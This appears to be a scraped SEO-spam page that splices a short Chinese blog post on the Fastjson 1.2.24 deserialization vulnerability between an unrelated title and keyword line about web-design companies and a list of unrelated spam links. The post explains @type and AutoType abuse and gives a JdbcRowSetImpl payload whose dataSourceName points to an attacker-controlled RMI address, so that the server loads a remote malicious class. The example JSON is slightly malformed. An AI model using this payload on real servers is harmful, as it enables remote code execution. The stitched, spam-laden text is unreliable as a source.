当前位置: 首页 > news >正文

北京都有那些做网站的公司建设美食电子商务网站

北京都有那些做网站的公司,建设美食电子商务网站,wordpress 小众软件 主题,深圳松岗网站建设fastjson漏洞 fastjson工作原理攻击原理补充 例子 fastjson工作原理 fastjson的作用是将JAVA对象转换成对应的json表示形式,也可以反过来将json转化为对应的Java对象。fastjson使用AutoType功能进行反序列化,AutoType使用type标记字符的原始类型&#x…

fastjson漏洞

  • fastjson工作原理
  • 攻击原理
    • 补充
  • 例子

fastjson工作原理

fastjson的作用是将JAVA对象转换成对应的json表示形式,也可以反过来将json转化为对应的Java对象。fastjson使用AutoType功能进行反序列化,AutoType使用==@type==标记字符的原始类型,在反序列话时会读取@type以此把内容反序列化到对象,在上述过程中会调用到库中的setter和getter方法

攻击原理

攻击者传入一个恶意构造的json内容,程序对其反序列话后得到恶意类并执行了恶意类中的恶意函数,进而促使恶意代码执行
合理构造一个JSON使用@type指定一个想要攻击的类库就可以实现攻击

补充

仅影响Fastjson1.2.24及之前版本

例子


{"b": {"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName": "rmi://攻击者的IP地址/恶意类","autoCommit": true}
  • JSON 数据包:这里展示的 JSON 数据包包含一个名为 b 的对象,其中有一个 @type 字段,指定了这个对象的类型为
    com.sun.rowset.JdbcRowSetImpl。这是一种 Java 对象类型。
  • 恶意数据:在 dataSourceName 字段中,提供了一个远程方法调用 (RMI) 的 URL,指向攻击者的 IP
    地址和他们控制的恶意类。这意味着 Fastjson 会尝试从这个远程地址加载并执行恶意类。
  • 自动提交:autoCommit 字段被设置为 true,表明在反序列化后自动执行某些操作。
http://www.yayakq.cn/news/923357/

相关文章:

  • 企业网站推广计划免费crm试用
  • 泉州英文网站建设网站备案需要费用吗
  • 响应式网站免费模板下载p2p的网站开发
  • 哪些外国购物网站可以做高端模版网站
  • 网站运营面试企业邮箱收费吗
  • 商业网站开发岗位需求分析阿里云可以做电影网站
  • 甘肃网站推广河北大名网站建设招聘
  • 网站后台维护月薪多少wordpress 默认html5
  • 网站建设人工智能开发百度问答库
  • 煤矿建设工程质量监督总站网站中学生做的网站有哪些
  • 想做个网站报价蔬菜价格怎么做wordpress怎么取消谷歌字体
  • 公司网站空间怎么续费html网页设计大赛
  • 网站界面怎么做百捷网站建设
  • 镇江建网站手工小制作 小学生
  • 建设官方企业网站wordpress 相册 主题
  • 广州网站设计制作报价建设平台网站
  • 网站毕业设计一般做几个页面城市中国商业网站平台
  • 选择郑州网站建设做网站有用nodejs
  • 推广型网站免费建设删除hao123主页
  • 微信公众号服务号网站开发流程图企业网站建设开发服务
  • 网站建设 html5免费php网站模板
  • 百度不更新网站网站备案规定
  • 什么语言开发网站危险网站怎么做二维码
  • 企业网站不备案会怎么样加入网站帮忙做网站
  • 站长之家网站查询十大网站建设服务商
  • wordpress多站点开启宿州金融网站建设
  • 青海网站建设多少钱小企业怎么建网站平台
  • vs做网站的书籍中国设计联盟官网
  • 广州网站建设制作的公司做平面设计必看的网站
  • dede企业网站模板wordpress调用js函数